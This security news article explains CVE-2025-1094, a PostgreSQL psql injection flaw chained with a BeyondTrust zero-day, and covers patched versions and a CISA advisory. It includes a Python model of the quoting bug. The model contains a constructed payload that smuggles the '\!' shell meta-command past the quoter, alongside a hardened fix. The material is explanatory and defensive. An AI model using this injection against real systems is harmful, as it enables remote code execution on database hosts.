Threat actors have exploited a zero-day vulnerability in BeyondTrust’s Privileged Remote Access (PRA) and Remote Support (RS) products, and in doing so they also took advantage of a previously unknown SQL injection flaw in PostgreSQL. Rapid7 uncovered the chain while analysing the BeyondTrust attacks, a reminder that a single intrusion often relies on flaws in more than one product.
Overview of the Vulnerabilities
The PostgreSQL vulnerability, designated CVE-2025-1094, carries a CVSS score of 8.1. It specifically affects psql, PostgreSQL’s interactive terminal. Security researcher Stephen Fewer explains that attackers can turn the SQL injection into arbitrary code execution because psql can run meta-commands, including one that executes operating system shell commands.
Furthermore, Rapid7’s investigation into the BeyondTrust vulnerability, tracked as CVE-2024-12356, revealed that a successful remote code execution exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094. This dependency underscores the need for organizations to address both vulnerabilities promptly.
Details of the PostgreSQL Vulnerability
The root cause of CVE-2025-1094 lies in how PostgreSQL handles invalid UTF-8 byte sequences: libpq’s string-quoting functions (PQescapeLiteral and related routines) treat an invalid multi-byte lead byte and the byte that follows it as one character, so a single quote placed right after such a byte is not doubled, while psql’s lexer reads byte by byte and sees that quote as the end of the string literal. Anything after it is parsed as new psql input, including the meta-command “\!”, which executes a shell command. Fewer elaborates that attackers can control the operating system shell command executed through this meta-command or execute arbitrary SQL statements.
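To make the quoting mismatch concrete, here is an added Python model of the two sides described above. It is illustrative code written for this page, not PostgreSQL, libpq or psql source: the quoter mimics the pre-fix PQescapeLiteral loop (it judges a character’s length from the lead byte alone, as pg_utf_mblen does), the lexer is a deliberately simplified stand-in for psql’s byte-oriented scanner (no comments, dollar quoting or E'' strings), and the `users` query, the `build_script` application and the `PAYLOAD` value are constructed for the demonstration.

```python
"""Model of the CVE-2025-1094 quoting mismatch (illustrative, not PostgreSQL code)."""


def utf8_mblen(lead: int) -> int:
    """Sequence length judged from the lead byte only, the way pg_utf_mblen()
    does: continuation bytes are never checked."""
    if lead & 0x80 == 0:
        return 1
    if lead & 0xE0 == 0xC0:
        return 2
    if lead & 0xF0 == 0xE0:
        return 3
    if lead & 0xF8 == 0xF0:
        return 4
    return 1


def quote_literal_vulnerable(raw: bytes) -> bytes:
    """Models the pre-fix PQescapeLiteral() loop: the bytes of a multi-byte
    sequence are copied through untouched, so a quote that happens to follow
    an invalid lead byte such as 0xC0 is never doubled."""
    out = bytearray(b"'")
    i = 0
    while i < len(raw):
        n = utf8_mblen(raw[i])
        if n > 1:
            out += raw[i:i + n]  # copied verbatim, whatever the bytes are
            i += n
            continue
        if raw[i] == ord("'"):
            out += b"''"
        else:
            out.append(raw[i])
        i += 1
    out += b"'"
    return bytes(out)


def quote_literal_fixed(raw: bytes) -> bytes:
    """Hardened form: refuse anything that is not valid UTF-8 before quoting,
    so the byte-skip above can never swallow a quote. Raises UnicodeDecodeError
    on 0xC0, which is never a valid UTF-8 lead byte."""
    raw.decode("utf-8")
    return b"'" + raw.replace(b"'", b"''") + b"'"


def psql_meta_commands(script: bytes) -> list[bytes]:
    """Simplified model of psql's lexer. It is byte oriented, so 0xC0 is just
    another byte inside a string; a lone quote ends the string, a doubled
    quote is a literal quote, and outside a string a backslash starts a
    meta-command that runs to end of line. Returns the meta-commands seen."""
    cmds = []
    in_string = False
    i = 0
    while i < len(script):
        b = script[i]
        if in_string:
            if b == ord("'"):
                if script[i + 1:i + 2] == b"'":
                    i += 1  # doubled quote, stay inside the string
                else:
                    in_string = False
        elif b == ord("'"):
            in_string = True
        elif b == ord("\\"):
            end = script.find(b"\n", i)
            end = len(script) if end == -1 else end
            cmds.append(script[i:end])
            i = end
            continue
        i += 1
    return cmds


def build_script(username: bytes, quote) -> bytes:
    """Constructed application pattern: psql input built from an untrusted value."""
    return b"SELECT * FROM users WHERE name = " + quote(username) + b";\n"


def leaks_meta_command(username: bytes, quote) -> bool:
    """True when quoting `username` with `quote` lets the lexer see a meta-command."""
    try:
        script = build_script(username, quote)
    except UnicodeDecodeError:
        return False  # the hardened quoter refused the input outright
    return bool(psql_meta_commands(script))


# Constructed attacker-controlled value: an invalid lead byte, the quote the
# vulnerable quoter will not double, then a psql meta-command on its own line.
PAYLOAD = b"\xC0'\n\\! id\n"

if __name__ == "__main__":
    print(build_script(PAYLOAD, quote_literal_vulnerable))
    print("vulnerable quoter:", psql_meta_commands(build_script(PAYLOAD, quote_literal_vulnerable)))
    print("hardened quoter refuses:", not leaks_meta_command(PAYLOAD, quote_literal_fixed))
```

Run it and the vulnerable path yields the meta-command `\! id` outside any string literal, while a valid multi-byte character followed by a quote (for example `é'`) is quoted safely by both versions, which is why the bug went unnoticed in ordinary input. The strict UTF-8 check is the application-side mitigation the model shows; the stronger fix remains not to feed untrusted strings into psql at all, since the quoting routines were never intended to make psql input safe.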
Mitigation and Updates
In response to the discovery of CVE-2025-1094, maintainers have released updates to address the vulnerability in the following versions:
- PostgreSQL 17 (Fixed in 17.3)
- PostgreSQL 16 (Fixed in 16.7)
- PostgreSQL 15 (Fixed in 15.11)
- PostgreSQL 14 (Fixed in 14.16)
- PostgreSQL 13 (Fixed in 13.19)
Organizations running any earlier release in these branches should upgrade immediately; the PostgreSQL 12 branch and older are out of support and receive no fix.
Broader Implications and CISA Advisory
This development coincides with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) adding a security flaw in SimpleHelp remote support software (CVE-2024-57727, CVSS score: 7.5, an unauthenticated path traversal bug) to its Known Exploited Vulnerabilities (KEV) catalog. Consequently, federal civilian agencies must apply the fixes by March 6, 2025. The listing emphasizes the urgency of patching remote support tools, which sit on the network edge and are a recurring target.